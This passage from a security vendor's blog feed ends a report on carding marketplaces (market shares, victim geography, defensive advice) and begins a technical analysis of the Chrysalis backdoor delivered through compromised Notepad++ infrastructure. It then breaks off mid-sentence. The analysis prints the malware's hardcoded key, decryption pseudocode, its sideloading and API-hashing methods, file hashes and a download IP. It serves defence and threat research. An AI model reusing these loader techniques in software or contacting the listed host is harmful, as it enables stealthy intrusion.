Prices typically range from $17 to $49, though higher prices are often observed for records that include PINs, an uncommon feature among carding marketplaces.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte4fbbe49cc99049d/698b91e4eb4805b5c0c0b235/Search-Dumps-tab-Brian’s-Club.png" alt="Search-Dumps-tab-Brian’s-Club.png" caption="Figure 13 - The “Search Dumps” tab on Brian’s Club" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Search-Dumps-tab-Brian’s-Club.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte4fbbe49cc99049d/698b91e4eb4805b5c0c0b235/Search-Dumps-tab-Brian’s-Club.png" data-sys-asset-uid="blte4fbbe49cc99049d" data-sys-asset-filename="Search-Dumps-tab-Brian’s-Club.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 13 - The “Search Dumps” tab on Brian’s Club" data-sys-asset-alt="Search-Dumps-tab-Brian’s-Club.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 13 - The “Search Dumps” tab on Brian’s Club</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Another key point of differentiation for Brian’s Club is its extensive offering of dumps, suggesting explicit support for credit card cloning. This is further reinforced by the availability of a “Track1 Generator” tool, which facilitates the creation of physical copies of compromised cards. Together, these features represent a relatively unique value proposition within the carding market and indicate that Brian’s Club administrators have deliberately positioned the platform to address specific customer needs and prevailing market dynamics.</span></p><h2>General statistics</h2><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Note:</strong></em></span><span style='font-size: undefined;'><em> The data in this section, specifically the numerical figures, comes directly from the marketplaces and, therefore, its precision cannot be independently verified or guaranteed.</em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Out of the examined marketplaces, Findsome has the largest market size with 57.6%, followed by UltimateShop (26.6%) and Brian’s Club (15.8%)</span>(Figure 14)<span style='font-size: undefined;'>. </span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78f348196adae76d/698b92d85be973d4b93c0556/Fig_14.jpg" alt="Count-of-leaked-credit-cards-by-marketplace-rapid7.jpg" caption="Figure 14 - The market size of the examined marketplaces" height="545" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Count-of-leaked-credit-cards-by-marketplace-rapid7.jpg" width="664" max-width="664" max-height="545" style="max-width: 664px; width: 664px; max-height: 545px; height: 545px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78f348196adae76d/698b92d85be973d4b93c0556/Fig_14.jpg" data-sys-asset-uid="blt78f348196adae76d" data-sys-asset-filename="Fig_14.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 14 - The market size of the examined marketplaces" data-sys-asset-alt="Count-of-leaked-credit-cards-by-marketplace-rapid7.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 14 - The market size of the examined marketplaces</figcaption></div></figure><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>The vast majority of leaked credit cards are Visa cards (60.4%), followed by Mastercard (32.3%), American Express (4.3%), and Discover (3%), with this distribution remaining consistent across the three examined marketplaces (Figure 15). These numbers, however, do not reflect the actual market size of each brand, as according to the 2025 Nilson Report, Visa and Mastercard control relatively similar market sizes, with 32% and 24%, respectively, and American Express and Discover are far behind with 6% and 0.9%. In addition, the most popular credit card brand, Union Pay, with 36% of the market, is not even among the top 4 most leaked brands, probably due to its relatively unique target audience (China), which is not typically targeted by carders in these marketplaces.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>However, the leaked credit cards' brand distribution more closely resembles their market share in the United States (Visa - 52%, Mastercard - 24%, American Express - 19%, Discover - 5%), which is where most of the victims originate.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltab272ece2cdd0959/698b935995a6d99c1a4494cd/Leaked-credit-card-brand-distribution-by-marketplace.png" alt="Leaked-credit-card-brand-distribution-by-marketplace.png" caption="Figure 15 - Leaked credit card brand distribution by marketplace" height="673" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Leaked-credit-card-brand-distribution-by-marketplace.png" width="1087" max-width="1087" max-height="673" style="max-width: 1087px; width: 1087px; max-height: 673px; height: 673px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltab272ece2cdd0959/698b935995a6d99c1a4494cd/Leaked-credit-card-brand-distribution-by-marketplace.png" data-sys-asset-uid="bltab272ece2cdd0959" data-sys-asset-filename="Leaked-credit-card-brand-distribution-by-marketplace.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 15 - Leaked credit card brand distribution by marketplace" data-sys-asset-alt="Leaked-credit-card-brand-distribution-by-marketplace.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 15 - Leaked credit card brand distribution by marketplace</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Most of the leaked credit cards we observed in H2 2025 belong to US customers, followed by ones from Canada (by a large margin) and the United Kingdom (Figure 16). </span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7aad90a7613d9531/698b939795a6d96b0a4494d1/Global-credit-card-leakage-heatmap.png" alt="Global-credit-card-leakage-heatmap.png" caption="Figure 16 - Global credit card leakage heatmap" height="567" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Global-credit-card-leakage-heatmap.png" width="1089" max-width="1089" max-height="567" style="max-width: 1089px; width: 1089px; max-height: 567px; height: 567px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7aad90a7613d9531/698b939795a6d96b0a4494d1/Global-credit-card-leakage-heatmap.png" data-sys-asset-uid="blt7aad90a7613d9531" data-sys-asset-filename="Global-credit-card-leakage-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 16 - Global credit card leakage heatmap" data-sys-asset-alt="Global-credit-card-leakage-heatmap.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 16 - Global credit card leakage heatmap</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>When comparing the top 10 countries list of each of the examined marketplaces (Figures 17, 18, and 19), we can see that UltimateShop’s list is somewhat unusual, with rarely targeted countries, like Peru and Norway, making the Top 10 list while surpassing very populated and highly targeted countries, such as the United Kingdom and France. In this sense, it should be noted that the geographic data sourced from UltimateShop contained numerous inconsistencies. Thus, it may not be a reliable indicator of the actual distribution of victims.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5ba67d970e552d3a/698b93c79009430bb6f8c13b/Fig_17.jpg" height="621" alt="top-ten-countries-leaked-credit-cards-findsome.jpg" caption="Figure 17 - Top 10 countries with leaked credit cards on Findsome" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="top-ten-countries-leaked-credit-cards-findsome.jpg" width="661" max-width="661" max-height="621" style="width: 661px; height: 621px; max-width: 661px; max-height: 621px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5ba67d970e552d3a/698b93c79009430bb6f8c13b/Fig_17.jpg" data-sys-asset-uid="blt5ba67d970e552d3a" data-sys-asset-filename="Fig_17.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 17 - Top 10 countries with leaked credit cards on Findsome" data-sys-asset-alt="top-ten-countries-leaked-credit-cards-findsome.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 17 - Top 10 countries with leaked credit cards on Findsome</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltceb03ba5683213a3/698b93c71ab63e1c8027cea3/Fig_18.jpg" height="617" alt="top-ten-countries-leaked-credit-cards-UltimateShop.jpg" caption="Figure 18 - Top 10 countries with leaked credit cards on UltimateShop" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="top-ten-countries-leaked-credit-cards-UltimateShop.jpg" width="657" max-width="657" max-height="617" style="width: 657px; height: 617px; max-width: 657px; max-height: 617px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltceb03ba5683213a3/698b93c71ab63e1c8027cea3/Fig_18.jpg" data-sys-asset-uid="bltceb03ba5683213a3" data-sys-asset-filename="Fig_18.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 18 - Top 10 countries with leaked credit cards on UltimateShop" data-sys-asset-alt="top-ten-countries-leaked-credit-cards-UltimateShop.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 18 - Top 10 countries with leaked credit cards on UltimateShop</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1faf6fdeb5adf981/698b93c7a788a70e3da081af/Fig_19.jpg" height="621" alt="top-ten-countries-leaked-credit-cards-Brians-Club.jpg" caption="Figure 19 - Top 10 countries with leaked credit cards on Brian’s Club" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="top-ten-countries-leaked-credit-cards-Brians-Club.jpg" width="661" max-width="661" max-height="621" style="width: 661px; height: 621px; max-width: 661px; max-height: 621px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1faf6fdeb5adf981/698b93c7a788a70e3da081af/Fig_19.jpg" data-sys-asset-uid="blt1faf6fdeb5adf981" data-sys-asset-filename="Fig_19.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 19 - Top 10 countries with leaked credit cards on Brian’s Club" data-sys-asset-alt="top-ten-countries-leaked-credit-cards-Brians-Club.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 19 - Top 10 countries with leaked credit cards on Brian’s Club</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>When examining the monthly distribution of leaked credit cards (Figure 20), we observe that the largest volume was recorded in November and December, likely due to the shopping season (e.g., Black Friday and Cyber Monday) that occurs around that time.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt886b9c548e68a829/698b947be7dc92592eadee1a/chart-leaked-credit-cards-by-country-per-month.jpg" height="668" alt="chart-leaked-credit-cards-by-country-per-month.jpg" caption="Figure 20 - Count of leaked credit cards by country per month" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="chart-leaked-credit-cards-by-country-per-month.jpg" width="935" style="width: 935px; height: 668px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt886b9c548e68a829/698b947be7dc92592eadee1a/chart-leaked-credit-cards-by-country-per-month.jpg" data-sys-asset-uid="blt886b9c548e68a829" data-sys-asset-filename="chart-leaked-credit-cards-by-country-per-month.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 20 - Count of leaked credit cards by country per month" data-sys-asset-alt="chart-leaked-credit-cards-by-country-per-month.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 20 - Count of leaked credit cards by country per month</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>When examining the types of personal information being exposed along with the leaked credit card, we saw that most of the credit cards are also attached with an email address or a phone number (or both), with the highest percentages recorded in UltimateShop (99.4% of the cases), followed by Findsome (87.7%), and Brian’s Club (75.7%). This means that the leakage of a credit card not only poses a risk for financial scams resulting in monetary losses, but also exposes PII, which may lead to identity theft and impersonation attempts.</span></p><h2>The future of carding</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The carding ecosystem is gradually moving away from large-scale magnetic stripe (“dump”) fraud as EMV adoption makes card cloning harder and less reliable. While shimming and the capture of PINs allow criminals to continue card-present fraud, this approach is riskier, more expensive, and usually limited to specific regions or devices. As a result, EMV-based fraud is unlikely to fully replace the dump economy at scale. Instead, it is expected to support smaller, localized operations rather than the global, highly automated carding marketplaces that dominated in the past.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At the same time, carding marketplaces are increasingly focused on selling richer data sets that include personal and contact information (“Fullz”), not just card details. This shift enables a wider range of fraud, including account takeover, wallet abuse, phishing, and identity-based scams, which are less dependent on the underlying payment technology. Rather than disappearing, carding-as-a-service is evolving into a broader identity-driven ecosystem, where marketplaces supply raw data, and buyers use automation and AI to decide how and where to exploit it.</span></p><h2 style="direction: ltr;">What organizations should do</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The continued growth of carding marketplaces highlights how credit card theft has evolved into a resilient, service-based criminal economy that is difficult to disrupt through takedowns alone. In addition, as stolen cards are increasingly bundled with credentials and personal data, the potential damage inflicted by the CaaS economy has ceased to be purely financial. The impact extends beyond isolated fraud events to long-term identity abuse and account compromise affecting both organizations and consumers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To cope with the growing threat of stolen credit cards and leaked credentials, organizations should adopt a defense-in-depth approach that combines prevention, detection, and rapid response. This includes strengthening protections against common compromise vectors such as phishing, malware, and web application vulnerabilities by enforcing multi-factor authentication, regularly patching systems, hardening payment pages against client-side attacks, and conducting ongoing security awareness training. At the same time, organizations should invest in continuous monitoring capabilities to detect early signs of exposure, including visibility into dark web and underground marketplaces where stolen card data and credentials are traded. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By proactively identifying leaked assets, correlating them to their own environments (for example, through BIN monitoring), and responding quickly through card reissuance, credential resets, and fraud monitoring, organizations can significantly reduce both financial losses and downstream risks such as identity theft and account takeover.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>There are multiple detections in place for Threat Command and MDRP customers to identify and alert on the threat actor behaviors described in this blog. Specifically, </span><a class="embedded-entry redactor-component block-entry" type="entry" target="_self" href="/products/threat-command" data-sys-entry-uid="blta94d660b3863fa52" data-sys-entry-locale="en-us" data-sys-content-type-uid="page" sys-style-type="link"><span style='font-size: undefined;'>Threat Command</span></a><span style='font-size: undefined;'> monitors dark web activity, including exposed credit card details that are being sold on carding marketplaces. Relevant incidents are flagged based on the customer’s assets, specifically their BIN. When a listing containing these assets is identified, a “Credit Cards For Sale” alert is issued (Figure 21). In addition to notifying customers, these alerts enable them to quickly and securely acquire the detected bot through the “Ask an Analyst” service.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5eb7ec8b0a6b6c78/698b94e85be97360343c055e/carding-marketplace-example-alert.png" height="581" alt="carding-marketplace-example-alert.png" caption="Figure 21 - Example of an alert about a credit card offered for sale on a carding marketplace" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="carding-marketplace-example-alert.png" width="830" style="width: 830px; height: 581px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5eb7ec8b0a6b6c78/698b94e85be97360343c055e/carding-marketplace-example-alert.png" data-sys-asset-uid="blt5eb7ec8b0a6b6c78" data-sys-asset-filename="carding-marketplace-example-alert.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 21 - Example of an alert about a credit card offered for sale on a carding marketplace" data-sys-asset-alt="carding-marketplace-example-alert.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 21 - Example of an alert about a credit card offered for sale on a carding marketplace</figcaption></div></figure><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-carding-as-a-service-stolen-credit-cards-fraud</link>
      <guid isPermaLink="false">blt3d13068923ae26db</guid>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Phishing]]></category>
      <category><![CDATA[Dark Web]]></category><dc:creator><![CDATA[Alexandra Blia]]></dc:creator>
      <pubDate>Thu, 12 Feb 2026 14:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebc2810157aecfaf/68af2715c53b04810df94abb/blog-hero-generic-pixel.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central America, focusing on government, telecom, aviation, critical infrastructure, and media sectors.</span></p><p style="direction: ltr;"><span style='color:rgb(68, 71, 70);font-size: undefined;'>Our investigation identified a security incident stemming from a sophisticated compromise of the infrastructure hosting Notepad++, which was subsequently used to deliver a previously undocumented custom backdoor</span><span style='font-size: undefined;'>, which we have dubbed </span><span style='font-size: undefined;'><span data-type='inlineCode'>Chrysalis</span></span><span style='font-size: undefined;'>.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78d5255e4bec3077/6980bb18831fe853231a96c6/lotus-blossom-telemetry.jpg" alt="lotus-blossom-telemetry.jpg" caption="Figure 1: Telemetry on the custom backdoor samples" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-telemetry.jpg" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78d5255e4bec3077/6980bb18831fe853231a96c6/lotus-blossom-telemetry.jpg" data-sys-asset-uid="blt78d5255e4bec3077" data-sys-asset-filename="lotus-blossom-telemetry.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 1: Telemetry on the custom backdoor samples" data-sys-asset-alt="lotus-blossom-telemetry.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: Telemetry on the custom backdoor samples</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Beyond the discovery of the new implant, forensic evidence led us to uncover several custom loaders in the wild. One sample, </span><span style='font-size: undefined;'><em>“ConsoleApplication2.exe”</em></span><span style='font-size: undefined;'>, stands out for its use of Microsoft Warbird, a complex code protection framework, to hide shellcode execution. This blog provides a deep technical analysis of Chrysalis, the Warbird loader, and the broader tactic of mixing straightforward loaders with obscure, undocumented system calls.</span></p><h2>Initial access vector: Notepad++ and update.exe</h2><p style="direction: ltr;">Forensic analysis conducted by the MDR team suggests that the initial access vector aligns with publicly disclosed abuse of the Notepad++ distribution infrastructure. While <a href="https://notepad-plus-plus.org/news/hijacked-incident-info-update/"><span style='font-size: undefined;'>reporting</span></a> references both plugin replacement and updater-related mechanisms, no definitive artifacts were identified to confirm exploitation of either. The only confirmed behavior is that execution of <em>“notepad++.exe”</em> and subsequently <em>“GUP.exe”</em> preceded the execution of a suspicious process <em>“update.exe”</em> which was downloaded from 95.179.213.0.</p><h2>Analysis of update.exe</h2><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd4fbd1b5b4e1bd25/6980bb9d090b8315c274c37c/lotus-blossom-execution-diagram-of-update-exe.png" alt="lotus-blossom-execution-diagram-of-update-exe.png" caption="Figure 2: Execution diagram of update.exe" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-execution-diagram-of-update-exe.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd4fbd1b5b4e1bd25/6980bb9d090b8315c274c37c/lotus-blossom-execution-diagram-of-update-exe.png" data-sys-asset-uid="bltd4fbd1b5b4e1bd25" data-sys-asset-filename="lotus-blossom-execution-diagram-of-update-exe.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Execution diagram of update.exe" data-sys-asset-alt="lotus-blossom-execution-diagram-of-update-exe.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2: Execution diagram of update.exe</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Analysis of</span><span style='font-size: undefined;'><em> “update.exe”</em></span><span style='font-size: undefined;'> shows the file is actually an NSIS installer, a tool commonly used by </span><a href="https://www.rapid7.com/blog/post/2025/05/22/nsis-abuse-and-srdi-shellcode-anatomy-of-the-winos-4-0-campaign/"><span style='font-size: undefined;'>Chinese APT</span></a><span style='font-size: undefined;'> to deliver initial payload.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The following are the extracted NSIS installer files:</span></p><h4><span style='font-size: undefined;'>[NSIS].nsi</span></h4><ul><li><strong>Description:</strong> NSIS Installation script</li><li><strong>SHA-256: </strong>8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e</li></ul><h4>BluetoothService.exe</h4><ul><li><p style="direction: ltr;"><strong>Description:</strong> renamed Bitdefender Submission Wizard used for DLL sideloading</p></li><li><strong>SHA-256: </strong>2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924</li></ul><h4>BluetoothService</h4><ul><li><strong>Description: </strong>Encrypted shellcode</li><li><strong>SHA-256: </strong>77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e</li></ul><h4>log.dll</h4><ul><li><strong>Description: </strong>Malicious DLL sideloaded by BluetoothService.exe</li><li><strong>SHA-256: </strong>3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad</li></ul><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>Installation script is instructed to create a new directory </span><span style='font-size: undefined;'><em>“Bluetooth”</em></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>in </span><span style='font-size: undefined;'><em>“%AppData%”</em></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>folder, copy the remaining files there, change the attribute of the directory to </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>HIDDEN</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>and execute </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>BluetoothService.exe</em></span></span><span style='font-size: undefined;'><em>.</em></span></p><h3>DLL sideloading</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Shortly after the execution of </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>BluetoothService.exe</em></span></span><span style='font-size: undefined;'>,</span><span style='font-size: undefined;'><em> </em></span><span style='font-size: undefined;'>which is actually a renamed legitimate </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>Bitdefender Submission Wizard</em></span></span><span style='font-size: undefined;'> abused for </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>DLL sideloading</strong></span></span><span style='font-size: undefined;'>, a malicious </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>log.dll</em></span></span><span style='font-size: undefined;'> was placed alongside the executable, causing it to be loaded instead of the legitimate library. Two exported functions from </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>log.dll</em></span></span><span style='font-size: undefined;'> are called by </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>Bitdefender Submission Wizard</em></span></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>LogInit</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>LogWrite</strong></span></span><span style='font-size: undefined;'>.</span></p><h3>LogInit and LogWrite - Shellcode load, decrypt, execute</h3><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>LogInit</strong></span></span><span style='font-size: undefined;'> loads </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>BluetoothService</em></span></span><span style='font-size: undefined;'><em> </em></span><span style='font-size: undefined;'>into the memory of the running process.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>LogWrite</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>has a more sophisticated goal – to decrypt and execute the shellcode.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The decryption routine implements a custom runtime decryption mechanism used to unpack encrypted data in memory. It derives key material from previously calculated hash value and applies a stream‑cipher–like algorithm rather than standard cryptographic APIs. At a high level, the decryption routine relies on a linear congruential generator, with the standard constants </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>0x19660D</strong></span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>0x3C6EF35F</strong></span></span><span style='font-size: undefined;'>, combined with several basic data transformation steps to recover the plaintext payload.</span></p><p><span style='font-size: undefined;'>Once decrypted, the payload replaces the original buffer and all temporary memory is released. Execution is then transferred to this newly decrypted stage, which is treated as executable code and invoked with a predefined set of arguments, including runtime context and resolved API information.</span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17e6d0b98986647a/6980bcf7c302595bc9cb786f/lotus-blossom-LogWrite-internals.png" alt="lotus-blossom-LogWrite-internals.png" caption="Figure 3: LogWrite internals" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-LogWrite-internals.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17e6d0b98986647a/6980bcf7c302595bc9cb786f/lotus-blossom-LogWrite-internals.png" data-sys-asset-uid="blt17e6d0b98986647a" data-sys-asset-filename="lotus-blossom-LogWrite-internals.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: LogWrite internals" data-sys-asset-alt="lotus-blossom-LogWrite-internals.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: LogWrite internals</figcaption></div></figure><h3>IAT resolution</h3><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Log.dll</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>implements an API hashing subroutine to resolve required APIs during execution, reducing the likelihood of detection by antivirus and other security solutions.</span></p><h3>API hashing subroutine</h3><p style="direction: ltr;"><span style='font-size: undefined;'>The hashing algorithm will hash export names using </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>FNV‑1a</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>(fnv-1a hash 0x811C9DC5, fnv-1a prime 0x1000193 observed), then apply a </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>MurmurHash‑style avalanche finalizer</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>(murmur constant 0x85EBCA6B observed), and compare the result to a salted target hash.</span></p><h2 style="direction: ltr;">Analysis of the Chrysalis backdoor</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The shellcode, once decrypted by </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>log.dll</em></span></span><span style='font-size: undefined;'><em>,</em></span><span style='font-size: undefined;'> is a custom, feature-rich backdoor we've named “</span><span style='font-size: undefined;'><em>Chrysalis</em></span><span style='font-size: undefined;'>”. Its wide array of capabilities indicates it is a sophisticated and permanent tool, not a simple throwaway utility. It uses legitimate binaries to sideload a crafted DLL with a generic name, which makes simple filename-based detection unreliable. It relies on custom API hashing in both the loader and the main module, each with its own resolution logic. This is paired with layered obfuscation and a fairly structured approach to C2 communication. Overall, the sample looks like something that has been actively developed over time, and we’ll be keeping an eye on this family and any future variants that show up.</span></p><h3>Decryption of the main module</h3><p><span style='font-size: undefined;'>Once the execution is passed to decrypted shellcode from </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>log.dll</em></span></span><span style='font-size: undefined;'><em>,</em></span><span style='font-size: undefined;'> malware starts with decryption of the main module via a simple combination of XOR, addition and subtraction operations, with a hardcoded key </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>gQ2JR&9;</strong></span></span><span style='font-size: undefined;'>. See below the p</span>seudocode of decryption routine:</p><p style="direction: ltr;">⠀</p><pre language="cpp">char XORKey[8] = "gQ2JR&9;";
DWORD counter = 0;
DWORD pos = BufferPosition;

while (counter &lt; size) {
    BYTE k = XORKey[counter & 7];
    BYTE x = encrypted[pos];

    x = x + k;
    x = x ^ k;
    x = x - k;

    decrypted[pos] = x;

    pos++;
    counter++;
}</pre><p style="direction: ltr;">⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>XOR operation is performed 5 times in total, suggesting a section layout similar to PE format. Following the decryption, malware will proceed to yet another dynamic IAT resolution using </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>LoadLibraryA</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>to acquire a handle to </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Kernel32.dll</strong></span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>GetProcAddress</strong></span></span><span style='font-size: undefined;'>. Once exports are resolved, the jump is taken to the main module.</span></p><h3 style="direction: ltr;">Main module</h3><p style="direction: ltr;"><span style='font-size: undefined;'>The decrypted module is a reflective </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>PE-like</strong></span></span><span style='font-size: undefined;'> module that executes the </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>MSVC CRT</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>initialization sequence before transferring control to the program’s main entry point. Once in the Main function, the malware will dynamically load DLLs in the following order: 